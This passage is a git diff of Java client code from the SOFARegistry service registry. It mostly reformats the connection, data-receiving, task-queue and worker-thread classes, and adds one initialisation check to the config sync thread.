0.1 2018-02-26 20:28 zhuoyu.sjw Exp $$ */ public class ClientConnectionOpenEventProcessor implements ConnectionEventProcessor { - private static final Logger LOGGER = LoggerFactory - .getLogger(ClientConnectionOpenEventProcessor.class); + private static final Logger LOGGER = + LoggerFactory.getLogger(ClientConnectionOpenEventProcessor.class); - /** - * On event. - * - * @param remoteAddr the remote addr - * @param conn the conn - */ - @Override - public void onEvent(String remoteAddr, Connection conn) { - if (null != conn) { - LOGGER.info("[connection] Client connected, remote address: {}, localAddress: {}", - remoteAddr, conn.getLocalAddress()); - } + /** + * On event. + * + * @param remoteAddr the remote addr + * @param conn the conn + */ + @Override + public void onEvent(String remoteAddr, Connection conn) { + if (null != conn) { + LOGGER.info( + "[connection] Client connected, remote address: {}, localAddress: {}", + remoteAddr, + conn.getLocalAddress()); } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessor.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessor.java index 108598ca4..52573b316 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessor.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedConfigDataProcessor.java @@ -26,90 +26,92 @@ import com.alipay.sofa.registry.client.task.ObserverHandler; import com.alipay.sofa.registry.core.model.ReceivedConfigData; import com.alipay.sofa.registry.core.model.Result; -import org.slf4j.Logger; - import java.util.List; +import org.slf4j.Logger; /** * The type Received config data processor. + * * @author zhuoyu.sjw * @version $Id : ReceivedConfigDataProcessor.java, v 0.1 2018-04-18 15:40 zhuoyu.sjw Exp $$ */ public class ReceivedConfigDataProcessor extends SyncUserProcessor { - private static final Logger LOGGER = LoggerFactory.getLogger(ReceivedConfigDataProcessor.class); + private static final Logger LOGGER = LoggerFactory.getLogger(ReceivedConfigDataProcessor.class); - private RegisterCache registerCache; + private RegisterCache registerCache; - private ObserverHandler observerHandler; + private ObserverHandler observerHandler; - /** - * Instantiates a new Received config data processor. - * - * @param registerCache the register cache - * @param observerHandler the observer handler - */ - public ReceivedConfigDataProcessor(RegisterCache registerCache, ObserverHandler observerHandler) { - this.registerCache = registerCache; - this.observerHandler = observerHandler; - } + /** + * Instantiates a new Received config data processor. + * + * @param registerCache the register cache + * @param observerHandler the observer handler + */ + public ReceivedConfigDataProcessor(RegisterCache registerCache, ObserverHandler observerHandler) { + this.registerCache = registerCache; + this.observerHandler = observerHandler; + } - /** - * @see com.alipay.remoting.rpc.protocol.UserProcessor#handleRequest(BizContext, Object) - */ - @Override - public Object handleRequest(BizContext bizCtx, ReceivedConfigData request) { - Result result = new Result(); - result.setSuccess(true); - if (null == request) { - return result; - } + /** @see com.alipay.remoting.rpc.protocol.UserProcessor#handleRequest(BizContext, Object) */ + @Override + public Object handleRequest(BizContext bizCtx, ReceivedConfigData request) { + Result result = new Result(); + result.setSuccess(true); + if (null == request) { + return result; + } - List registIds = request.getConfiguratorRegistIds(); - try { + List registIds = request.getConfiguratorRegistIds(); + try { - ConfiguratorData configuratorData = new ConfiguratorData(); - configuratorData.setDataBox(request.getDataBox()); - configuratorData.setVersion(request.getVersion()); - for (String registId : registIds) { - Configurator configurator = registerCache.getConfiguratorByRegistId(registId); - if (null == configurator) { - continue; - } + ConfiguratorData configuratorData = new ConfiguratorData(); + configuratorData.setDataBox(request.getDataBox()); + configuratorData.setVersion(request.getVersion()); + for (String registId : registIds) { + Configurator configurator = registerCache.getConfiguratorByRegistId(registId); + if (null == configurator) { + continue; + } - if (configurator instanceof DefaultConfigurator) { - ((DefaultConfigurator) configurator).putConfiguratorData(configuratorData); - try { - observerHandler.notify(configurator); - } catch (Exception e) { - LOGGER - .error( - "[received] add configurator notify task error, dataId: {}, registId: {}", - configurator.getDataId(), configurator.getRegistId(), e); - } - } else { - LOGGER.warn("[received] ignore unknown configurator type: {}", configurator - .getClass().getName()); - } - } - LOGGER - .info( - "[received] receive configurator data save success, dataId: {} version: {} data:{} registIds:{}", - request.getDataId(), request.getVersion(), request.getDataBox(), registIds); - } catch (Exception e) { - result.setSuccess(false); - result.setMessage(""); - LOGGER.info( - "[received] receive configurator data save failed, dataId: {} version: {} data:{}", - request.getDataId(), request.getVersion(), request.getDataBox(), e); + if (configurator instanceof DefaultConfigurator) { + ((DefaultConfigurator) configurator).putConfiguratorData(configuratorData); + try { + observerHandler.notify(configurator); + } catch (Exception e) { + LOGGER.error( + "[received] add configurator notify task error, dataId: {}, registId: {}", + configurator.getDataId(), + configurator.getRegistId(), + e); + } + } else { + LOGGER.warn( + "[received] ignore unknown configurator type: {}", configurator.getClass().getName()); } - return result; + } + LOGGER.info( + "[received] receive configurator data save success, dataId: {} version: {} data:{} registIds:{}", + request.getDataId(), + request.getVersion(), + request.getDataBox(), + registIds); + } catch (Exception e) { + result.setSuccess(false); + result.setMessage(""); + LOGGER.info( + "[received] receive configurator data save failed, dataId: {} version: {} data:{}", + request.getDataId(), + request.getVersion(), + request.getDataBox(), + e); } + return result; + } - /** - * @see com.alipay.remoting.rpc.protocol.UserProcessor#interest() - */ - @Override - public String interest() { - return ReceivedConfigData.class.getName(); - } + /** @see com.alipay.remoting.rpc.protocol.UserProcessor#interest() */ + @Override + public String interest() { + return ReceivedConfigData.class.getName(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessor.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessor.java index bf128b396..a4af2042d 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessor.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ReceivedDataProcessor.java @@ -26,99 +26,106 @@ import com.alipay.sofa.registry.client.task.ObserverHandler; import com.alipay.sofa.registry.core.model.ReceivedData; import com.alipay.sofa.registry.core.model.Result; -import org.slf4j.Logger; - import java.util.List; +import org.slf4j.Logger; /** * The type Received data multi processor. + * * @author zhuoyu.sjw * @version $Id : ReceivedDataProcessor.java, v 0.1 2018-02-27 14:54 zhuoyu.sjw Exp $$ */ public class ReceivedDataProcessor extends SyncUserProcessor { - private static final Logger LOGGER = LoggerFactory.getLogger(ReceivedDataProcessor.class); + private static final Logger LOGGER = LoggerFactory.getLogger(ReceivedDataProcessor.class); - private RegisterCache registerCache; + private RegisterCache registerCache; - private ObserverHandler observerHandler; + private ObserverHandler observerHandler; - /** - * Instantiates a new Received data multi processor. - * - * @param registerCache the register cache - */ - public ReceivedDataProcessor(RegisterCache registerCache, ObserverHandler observerHandler) { - this.registerCache = registerCache; - this.observerHandler = observerHandler; - } + /** + * Instantiates a new Received data multi processor. + * + * @param registerCache the register cache + */ + public ReceivedDataProcessor(RegisterCache registerCache, ObserverHandler observerHandler) { + this.registerCache = registerCache; + this.observerHandler = observerHandler; + } - /** - * Handle request object. - * - * @param bizCtx the biz ctx - * @param request the request - * @return the object - */ - @Override - public Object handleRequest(BizContext bizCtx, ReceivedData request) { - Result result = new Result(); - result.setSuccess(true); - if (null == request || null == request.getData()) { - return result; - } - try { - List registIds = request.getSubscriberRegistIds(); - - SegmentData segmentData = new SegmentData(); - segmentData.setData(request.getData()); - segmentData.setVersion(request.getVersion()); - segmentData.setSegment(request.getSegment()); + /** + * Handle request object. + * + * @param bizCtx the biz ctx + * @param request the request + * @return the object + */ + @Override + public Object handleRequest(BizContext bizCtx, ReceivedData request) { + Result result = new Result(); + result.setSuccess(true); + if (null == request || null == request.getData()) { + return result; + } + try { + List registIds = request.getSubscriberRegistIds(); - for (String registId : registIds) { - Subscriber subscriber = registerCache.getSubscriberByRegistId(registId); - if (null == subscriber) { - continue; - } + SegmentData segmentData = new SegmentData(); + segmentData.setData(request.getData()); + segmentData.setVersion(request.getVersion()); + segmentData.setSegment(request.getSegment()); - if (subscriber instanceof DefaultSubscriber) { - DefaultSubscriber defaultSubscriber = (DefaultSubscriber) subscriber; - defaultSubscriber.putReceivedData(segmentData, request.getLocalZone()); - try { - observerHandler.notify(subscriber); - } catch (Exception e) { - LOGGER.error("[received] add notify task error, dataId: {}, registId: {}", - subscriber.getDataId(), subscriber.getRegistId(), e); - } - } else { - LOGGER.warn("[received] ignore unknown subscriber type: {}", subscriber - .getClass().getName()); - } - } + for (String registId : registIds) { + Subscriber subscriber = registerCache.getSubscriberByRegistId(registId); + if (null == subscriber) { + continue; + } - LOGGER - .info( - "[received] receive subscriber data save success, dataId: {} group: {} version: {} data:{} registIds:{}", - request.getDataId(), request.getGroup(), request.getVersion(), - request.getData(), registIds); - } catch (Exception e) { - result.setSuccess(false); - result.setMessage(""); - LOGGER - .info( - "[received] receive subscriber data save failed, dataId: {} group: {} version: {} data:{}", - request.getDataId(), request.getGroup(), request.getVersion(), - request.getData(), e); + if (subscriber instanceof DefaultSubscriber) { + DefaultSubscriber defaultSubscriber = (DefaultSubscriber) subscriber; + defaultSubscriber.putReceivedData(segmentData, request.getLocalZone()); + try { + observerHandler.notify(subscriber); + } catch (Exception e) { + LOGGER.error( + "[received] add notify task error, dataId: {}, registId: {}", + subscriber.getDataId(), + subscriber.getRegistId(), + e); + } + } else { + LOGGER.warn( + "[received] ignore unknown subscriber type: {}", subscriber.getClass().getName()); } - return result; - } + } - /** - * Interest string. - * - * @return the string - */ - @Override - public String interest() { - return ReceivedData.class.getName(); + LOGGER.info( + "[received] receive subscriber data save success, dataId: {} group: {} version: {} data:{} registIds:{}", + request.getDataId(), + request.getGroup(), + request.getVersion(), + request.getData(), + registIds); + } catch (Exception e) { + result.setSuccess(false); + result.setMessage(""); + LOGGER.info( + "[received] receive subscriber data save failed, dataId: {} group: {} version: {} data:{}", + request.getDataId(), + request.getGroup(), + request.getVersion(), + request.getData(), + e); } + return result; + } + + /** + * Interest string. + * + * @return the string + */ + @Override + public String interest() { + return ReceivedData.class.getName(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerManager.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerManager.java index cc92a1ef8..66737d762 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerManager.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerManager.java @@ -20,22 +20,23 @@ /** * The interface Server manager. + * * @author zhuoyu.sjw * @version $Id : ServerManager.java, v 0.1 2017-12-25 11:42 zhuoyu.sjw Exp $$ */ public interface ServerManager { - /** - * Gets server list. - * - * @return the server list - */ - List getServerList(); + /** + * Gets server list. + * + * @return the server list + */ + List getServerList(); - /** - * Random url. - * - * @return the url - */ - ServerNode random(); + /** + * Random url. + * + * @return the url + */ + ServerNode random(); } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerNode.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerNode.java index c9210d1c0..360baa2b0 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerNode.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/remoting/ServerNode.java @@ -20,36 +20,37 @@ /** * The interface Server node. + * * @author zhuoyu.sjw * @version $Id : ServerNode.java, v 0.1 2018-03-01 17:07 zhuoyu.sjw Exp $$ */ public interface ServerNode { - /** - * Gets host. - * - * @return the host - */ - String getHost(); + /** + * Gets host. + * + * @return the host + */ + String getHost(); - /** - * Gets port. - * - * @return the port - */ - int getPort(); + /** + * Gets port. + * + * @return the port + */ + int getPort(); - /** - * Gets properties. - * - * @return the properties - */ - Properties getProperties(); + /** + * Gets properties. + * + * @return the properties + */ + Properties getProperties(); - /** - * Gets url. - * - * @return the url - */ - String getUrl(); + /** + * Gets url. + * + * @return the url + */ + String getUrl(); } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/AbstractWorkerThread.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/AbstractWorkerThread.java index c4d6d2673..c2763ea5a 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/AbstractWorkerThread.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/AbstractWorkerThread.java @@ -20,53 +20,49 @@ /** * The type Abstract worker thread. + * * @author zhuoyu.sjw * @version $Id : AbstractWorkerThread.java, v 0.1 2018-03-01 11:54 zhuoyu.sjw Exp $$ */ public abstract class AbstractWorkerThread extends Thread implements Worker { - /** */ - private final Object bell = new Object(); + /** */ + private final Object bell = new Object(); - /** - * The Client. - */ - protected Client client; + /** The Client. */ + protected Client client; - /** - * Instantiates a new Abstract worker thread. - * - * @param client the client - */ - public AbstractWorkerThread(Client client) { - this.client = client; - } + /** + * Instantiates a new Abstract worker thread. + * + * @param client the client + */ + public AbstractWorkerThread(Client client) { + this.client = client; + } - /** - * Notify execute signal for task thread. - */ - void signal() { - synchronized (bell) { - bell.notifyAll(); - } + /** Notify execute signal for task thread. */ + void signal() { + synchronized (bell) { + bell.notifyAll(); } + } - /** - * Await for next task. - * @param timeout wait timeout - * @throws InterruptedException thread interrupted - */ - void await(long timeout) throws InterruptedException { - synchronized (bell) { - bell.wait(timeout); - } + /** + * Await for next task. + * + * @param timeout wait timeout + * @throws InterruptedException thread interrupted + */ + void await(long timeout) throws InterruptedException { + synchronized (bell) { + bell.wait(timeout); } + } - /** - * @see Runnable#run() - */ - @Override - public void run() { - handle(); - } + /** @see Runnable#run() */ + @Override + public void run() { + handle(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/ObserverHandler.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/ObserverHandler.java index 115086d6c..fea995f6b 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/ObserverHandler.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/ObserverHandler.java @@ -21,22 +21,23 @@ /** * The interface Observer handler. + * * @author zhuoyu.sjw * @version $Id : ObserverHandler.java, v 0.1 2018-03-15 12:15 zhuoyu.sjw Exp $$ */ public interface ObserverHandler { - /** - * Notify. - * - * @param subscriber the subscriber - */ - void notify(Subscriber subscriber); + /** + * Notify. + * + * @param subscriber the subscriber + */ + void notify(Subscriber subscriber); - /** - * Notify. - * - * @param configurator the configurator - */ - void notify(Configurator configurator); + /** + * Notify. + * + * @param configurator the configurator + */ + void notify(Configurator configurator); } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/SyncConfigThread.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/SyncConfigThread.java index 646e9615c..266de5c7c 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/SyncConfigThread.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/SyncConfigThread.java @@ -24,112 +24,118 @@ import com.alipay.sofa.registry.client.remoting.Client; import com.alipay.sofa.registry.core.model.SyncConfigRequest; import com.alipay.sofa.registry.core.model.SyncConfigResponse; -import org.slf4j.Logger; - import java.util.ArrayList; import java.util.Collection; import java.util.List; +import org.slf4j.Logger; /** - * * @author zhuoyu.sjw * @version $Id: SyncConfigThread.java, v 0.1 2018-03-14 23:36 zhuoyu.sjw Exp $$ */ public class SyncConfigThread extends Thread { - private static final Logger LOGGER = LoggerFactory.getLogger(SyncConfigThread.class); + private static final Logger LOGGER = LoggerFactory.getLogger(SyncConfigThread.class); + + private Client client; + + private RegisterCache registerCache; + + private RegistryClientConfig config; + + private ObserverHandler observerHandler; + + public SyncConfigThread( + Client client, + RegisterCache registerCache, + RegistryClientConfig config, + ObserverHandler observerHandler) { + super("SyncConfigThread"); + this.setDaemon(true); + this.client = client; + this.registerCache = registerCache; + this.config = config; + this.observerHandler = observerHandler; + } + + @Override + public void run() { + int retryInterval = config.getSyncConfigRetryInterval(); + //noinspection InfiniteLoopStatement + while (true) { + try { + Thread.sleep(retryInterval); + + if (!client.isConnected()) { + continue; + } - private Client client; + SyncConfigRequest request = new SyncConfigRequest(); + request.setDataCenter(config.getDataCenter()); + request.setZone(config.getZone()); + Object result = client.invokeSync(request); - private RegisterCache registerCache; + if (!(result instanceof SyncConfigResponse)) { + LOGGER.warn("[syncConfig] unknown response type, {}", result); + continue; + } - private RegistryClientConfig config; + SyncConfigResponse response = (SyncConfigResponse) result; + if (!response.isSuccess()) { + LOGGER.warn("[syncConfig] request failed, {}", response); + continue; + } - private ObserverHandler observerHandler; + int interval = response.getRetryInterval(); + retryInterval = Math.max(retryInterval, interval); - public SyncConfigThread(Client client, RegisterCache registerCache, - RegistryClientConfig config, ObserverHandler observerHandler) { - super("SyncConfigThread"); - this.setDaemon(true); - this.client = client; - this.registerCache = registerCache; - this.config = config; - this.observerHandler = observerHandler; - } + List availableSegments = response.getAvailableSegments(); - @Override - public void run() { - int retryInterval = config.getSyncConfigRetryInterval(); - //noinspection InfiniteLoopStatement - while (true) { - try { - Thread.sleep(retryInterval); - - if (!client.isConnected()) { - continue; - } - - SyncConfigRequest request = new SyncConfigRequest(); - request.setDataCenter(config.getDataCenter()); - request.setZone(config.getZone()); - Object result = client.invokeSync(request); - - if (!(result instanceof SyncConfigResponse)) { - LOGGER.warn("[syncConfig] unknown response type, {}", result); - continue; - } - - SyncConfigResponse response = (SyncConfigResponse) result; - if (!response.isSuccess()) { - LOGGER.warn("[syncConfig] request failed, {}", response); - continue; - } - - int interval = response.getRetryInterval(); - retryInterval = Math.max(retryInterval, interval); - - List availableSegments = response.getAvailableSegments(); - - Collection allSubscribers = registerCache.getAllSubscribers(); - for (Subscriber subscriber : allSubscribers) { - try { - if (!(subscriber instanceof DefaultSubscriber)) { - continue; - } - - DefaultSubscriber defaultSubscriber = (DefaultSubscriber) subscriber; - - List nowAvailableSegments = defaultSubscriber - .getAvailableSegments(); - - if (isEqualCollections(availableSegments, nowAvailableSegments)) { - continue; - } - - defaultSubscriber.setAvailableSegments(availableSegments); - - observerHandler.notify(defaultSubscriber); - } catch (Exception e) { - LOGGER - .error( - "[syncConfig] try notify subscriber error, registId: {}, availableSegments: {}", - subscriber.getRegistId(), availableSegments, e); - } - } - } catch (Throwable e) { - LOGGER.error("[syncConfig] sync config error, retryInterval: {}", retryInterval, e); + Collection allSubscribers = registerCache.getAllSubscribers(); + for (Subscriber subscriber : allSubscribers) { + try { + if (!(subscriber instanceof DefaultSubscriber)) { + continue; } - } - } - private boolean isEqualCollections(Collection a, Collection b) { - if (null == a) { - a = new ArrayList(); - } + DefaultSubscriber defaultSubscriber = (DefaultSubscriber) subscriber; + + if (!defaultSubscriber.isInited()) { + LOGGER.info( + "[syncConfig] DefaultSubscriber not init, {}", defaultSubscriber.getRegistId()); + continue; + } + List nowAvailableSegments = defaultSubscriber.getAvailableSegments(); + + if (isEqualCollections(availableSegments, nowAvailableSegments)) { + continue; + } - if (null == b) { - b = new ArrayList(); + defaultSubscriber.setAvailableSegments(availableSegments); + + observerHandler.notify(defaultSubscriber); + } catch (Exception e) { + LOGGER.error( + "[syncConfig] try notify subscriber error, registId: {}, availableSegments: {}", + subscriber.getRegistId(), + availableSegments, + e); + } } + } catch (Throwable e) { + LOGGER.error("[syncConfig] sync config error, retryInterval: {}", retryInterval, e); + } + } + } - return a.size() == b.size() && a.equals(b); + private boolean isEqualCollections(Collection a, Collection b) { + if (null == a) { + a = new ArrayList(); } + + if (null == b) { + b = new ArrayList(); + } + + return a.size() == b.size() && a.equals(b); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskEvent.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskEvent.java index ce62554e4..ed5db9d6c 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskEvent.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskEvent.java @@ -20,134 +20,131 @@ /** * The type Task event. + * * @author zhuoyu.sjw * @version $Id : TaskEvent.java, v 0.1 2018-02-28 20:33 zhuoyu.sjw Exp $$ */ public class TaskEvent implements Comparable { - private static final int MAX_DELAY_TIME = 1000; - - private Register source; - - private int sendCount; - - private long triggerTime; - - /** - * Constructor. - * - * @param source the source - */ - public TaskEvent(Register source) { - this.source = source; - this.triggerTime = System.currentTimeMillis(); - this.sendCount = 0; + private static final int MAX_DELAY_TIME = 1000; + + private Register source; + + private int sendCount; + + private long triggerTime; + + /** + * Constructor. + * + * @param source the source + */ + public TaskEvent(Register source) { + this.source = source; + this.triggerTime = System.currentTimeMillis(); + this.sendCount = 0; + } + + /** + * Getter method for property source. + * + * @return property value of source + */ + public Register getSource() { + return source; + } + + /** + * Setter method for property triggerTime. + * + * @param triggerTime value to be assigned to property triggerTime + */ + public void setTriggerTime(long triggerTime) { + this.triggerTime = triggerTime; + } + + /** + * Delay time long. + * + * @return long long + */ + public long delayTime() { + int time = sendCount * 200; + if (time > MAX_DELAY_TIME) { + time = MAX_DELAY_TIME; } - - /** - * Getter method for property source. - * - * @return property value of source - */ - public Register getSource() { - return source; + return time - (System.currentTimeMillis() - this.triggerTime); + } + + /** + * Compare to int. + * + * @param event the event + * @return the int + */ + @Override + public int compareTo(TaskEvent event) { + if (this.sendCount > event.sendCount) { + return 1; + } else if (this.sendCount < event.sendCount) { + return -1; } - - /** - * Setter method for property triggerTime. - * - * @param triggerTime value to be assigned to property triggerTime - */ - public void setTriggerTime(long triggerTime) { - this.triggerTime = triggerTime; + Register register1 = source; + Register register2 = event.getSource(); + + if (register1 == null) { + return register2 != null ? -1 : 0; + } else { + if (register2 == null) { + return 1; + } } - /** - * Delay time long. - * - * @return long long - */ - public long delayTime() { - int time = sendCount * 200; - if (time > MAX_DELAY_TIME) { - time = MAX_DELAY_TIME; - } - return time - (System.currentTimeMillis() - this.triggerTime); + long t1 = register1.getTimestamp(); + long t2 = register2.getTimestamp(); + if (t1 > t2) { + return 1; + } else if (t1 < t2) { + return -1; } - - /** - * Compare to int. - * - * @param event the event - * @return the int - */ - @Override - public int compareTo(TaskEvent event) { - if (this.sendCount > event.sendCount) { - return 1; - } else if (this.sendCount < event.sendCount) { - return -1; - } - Register register1 = source; - Register register2 = event.getSource(); - - if (register1 == null) { - return register2 != null ? -1 : 0; - } else { - if (register2 == null) { - return 1; - } - } - - long t1 = register1.getTimestamp(); - long t2 = register2.getTimestamp(); - if (t1 > t2) { - return 1; - } else if (t1 < t2) { - return -1; - } - return 0; + return 0; + } + + /** @see Object#equals(Object) */ + @Override + public boolean equals(Object o) { + if (this == o) { + return true; } - - /** - * @see Object#equals(Object) - */ - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (!(o instanceof TaskEvent)) { - return false; - } - - TaskEvent taskEvent = (TaskEvent) o; - - if (sendCount != taskEvent.sendCount) { - return false; - } - if (triggerTime != taskEvent.triggerTime) { - return false; - } - return source != null ? source.equals(taskEvent.source) : taskEvent.source == null; + if (!(o instanceof TaskEvent)) { + return false; } - /** - * @see Object#hashCode() - */ - @Override - public int hashCode() { - int result = source != null ? source.hashCode() : 0; - result = 31 * result + sendCount; - result = 31 * result + (int) (triggerTime ^ (triggerTime >>> 32)); - return result; - } + TaskEvent taskEvent = (TaskEvent) o; - /** - * Inc send count int. - * - * @return the int - */ - public int incSendCount() { - return this.sendCount++; + if (sendCount != taskEvent.sendCount) { + return false; + } + if (triggerTime != taskEvent.triggerTime) { + return false; } + return source != null ? source.equals(taskEvent.source) : taskEvent.source == null; + } + + /** @see Object#hashCode() */ + @Override + public int hashCode() { + int result = source != null ? source.hashCode() : 0; + result = 31 * result + sendCount; + result = 31 * result + (int) (triggerTime ^ (triggerTime >>> 32)); + return result; + } + + /** + * Inc send count int. + * + * @return the int + */ + public int incSendCount() { + return this.sendCount++; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskQueue.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskQueue.java index 8bc33eb60..81d755a19 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskQueue.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/TaskQueue.java @@ -18,7 +18,6 @@ import com.alipay.sofa.registry.client.api.Register; import com.alipay.sofa.registry.client.provider.AbstractInternalRegister; - import java.util.ArrayList; import java.util.Collections; import java.util.Iterator; @@ -28,68 +27,68 @@ /** * The type Task queue. + * * @author zhuoyu.sjw * @version $Id : TaskQueue.java, v 0.1 2018-02-28 20:44 zhuoyu.sjw Exp $$ */ public class TaskQueue implements Iterable { - private final ConcurrentMap taskMap = new ConcurrentHashMap(); - - /** - * Iterator iterator. - * - * @return the iterator - */ - @Override - public Iterator iterator() { - List taskList = new ArrayList(taskMap.values()); - Collections.sort(taskList); - return taskList.iterator(); - } + private final ConcurrentMap taskMap = + new ConcurrentHashMap(); - /** - * Delete the completed task, return task queue size. - */ - public void cleanCompletedTasks() { - List taskList = new ArrayList(taskMap.keySet()); - for (String key : taskList) { - TaskEvent event = taskMap.get(key); - AbstractInternalRegister r = (AbstractInternalRegister) event.getSource(); - if (r.isDone()) { - taskMap.remove(key, event); - } - } - taskMap.size(); - } + /** + * Iterator iterator. + * + * @return the iterator + */ + @Override + public Iterator iterator() { + List taskList = new ArrayList(taskMap.values()); + Collections.sort(taskList); + return taskList.iterator(); + } - /** - * Add task event to task queue. - * @param event task event - */ - public void put(TaskEvent event) { - Register register = event.getSource(); - String key = register.getRegistId(); - taskMap.put(key, event); + /** Delete the completed task, return task queue size. */ + public void cleanCompletedTasks() { + List taskList = new ArrayList(taskMap.keySet()); + for (String key : taskList) { + TaskEvent event = taskMap.get(key); + AbstractInternalRegister r = (AbstractInternalRegister) event.getSource(); + if (r.isDone()) { + taskMap.remove(key, event); + } } + taskMap.size(); + } - /** - * Put all. - * - * @param taskEvents the task events - */ - public void putAll(List taskEvents) { - for (TaskEvent event : taskEvents) { - put(event); - } - } + /** + * Add task event to task queue. + * + * @param event task event + */ + public void put(TaskEvent event) { + Register register = event.getSource(); + String key = register.getRegistId(); + taskMap.put(key, event); + } - /** - * Is empty boolean. - * - * @return the boolean - */ - public boolean isEmpty() { - return taskMap.isEmpty(); + /** + * Put all. + * + * @param taskEvents the task events + */ + public void putAll(List taskEvents) { + for (TaskEvent event : taskEvents) { + put(event); } + } + /** + * Is empty boolean. + * + * @return the boolean + */ + public boolean isEmpty() { + return taskMap.isEmpty(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/Worker.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/Worker.java index f3a89916e..1f988105b 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/Worker.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/Worker.java @@ -20,27 +20,26 @@ /** * The interface Worker. + * * @author zhuoyu.sjw * @version $Id : Worker.java, v 0.1 2018-02-28 22:45 zhuoyu.sjw Exp $$ */ public interface Worker { - /** - * Schedule. - * - * @param event the event - */ - void schedule(TaskEvent event); + /** + * Schedule. + * + * @param event the event + */ + void schedule(TaskEvent event); - /** - * Schedule. - * - * @param events the events - */ - void schedule(List events); + /** + * Schedule. + * + * @param events the events + */ + void schedule(List events); - /** - * Handle. - */ - void handle(); + /** Handle. */ + void handle(); } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/WorkerThread.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/WorkerThread.java index 285c656d3..d5d6af8a7 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/task/WorkerThread.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/task/WorkerThread.java @@ -24,173 +24,171 @@ import com.alipay.sofa.registry.client.provider.RegisterCache; import com.alipay.sofa.registry.client.remoting.Client; import com.alipay.sofa.registry.core.model.RegisterResponse; -import org.slf4j.Logger; - import java.util.Iterator; import java.util.List; import java.util.concurrent.atomic.AtomicBoolean; +import org.slf4j.Logger; /** * The type Worker thread. + * * @author zhuoyu.sjw * @version $Id : WorkerThread.java, v 0.1 2018-03-01 11:51 zhuoyu.sjw Exp $$ */ public class WorkerThread extends AbstractWorkerThread { - private static final Logger LOGGER = LoggerFactory.getLogger(WorkerThread.class); - - /** - * Task queue - */ - protected final TaskQueue requestQueue = new TaskQueue(); - - private RegistryClientConfig config; - - private RegisterCache registerCache; - - private AtomicBoolean inited = new AtomicBoolean(false); - - /** - * Instantiates a new Worker thread. - * - * @param client the client connection - * @param config the config - */ - public WorkerThread(Client client, RegistryClientConfig config, RegisterCache registerCache) { - super(client); - this.config = config; - this.registerCache = registerCache; - this.setName("RegistryWorkerThread"); - this.setDaemon(true); + private static final Logger LOGGER = LoggerFactory.getLogger(WorkerThread.class); + + /** Task queue */ + protected final TaskQueue requestQueue = new TaskQueue(); + + private RegistryClientConfig config; + + private RegisterCache registerCache; + + private AtomicBoolean inited = new AtomicBoolean(false); + + /** + * Instantiates a new Worker thread. + * + * @param client the client connection + * @param config the config + */ + public WorkerThread(Client client, RegistryClientConfig config, RegisterCache registerCache) { + super(client); + this.config = config; + this.registerCache = registerCache; + this.setName("RegistryWorkerThread"); + this.setDaemon(true); + } + + /** + * Schedule. + * + * @param event the event + */ + @Override + public void schedule(TaskEvent event) { + if (inited.compareAndSet(false, true)) { + this.start(); } - - /** - * Schedule. - * - * @param event the event - */ - @Override - public void schedule(TaskEvent event) { - if (inited.compareAndSet(false, true)) { - this.start(); - } - requestQueue.put(event); - signal(); + requestQueue.put(event); + signal(); + } + + /** + * Schedule. + * + * @param events the events + */ + @Override + public void schedule(List events) { + if (inited.compareAndSet(false, true)) { + this.start(); } - - /** - * Schedule. - * - * @param events the events - */ - @Override - public void schedule(List events) { - if (inited.compareAndSet(false, true)) { - this.start(); + requestQueue.putAll(events); + } + + /** Handle. */ + @Override + public void handle() { + //noinspection InfiniteLoopStatement + while (true) { + try { + // check connection status, try to reconnect to the server when connection lose + client.ensureConnected(); + + if 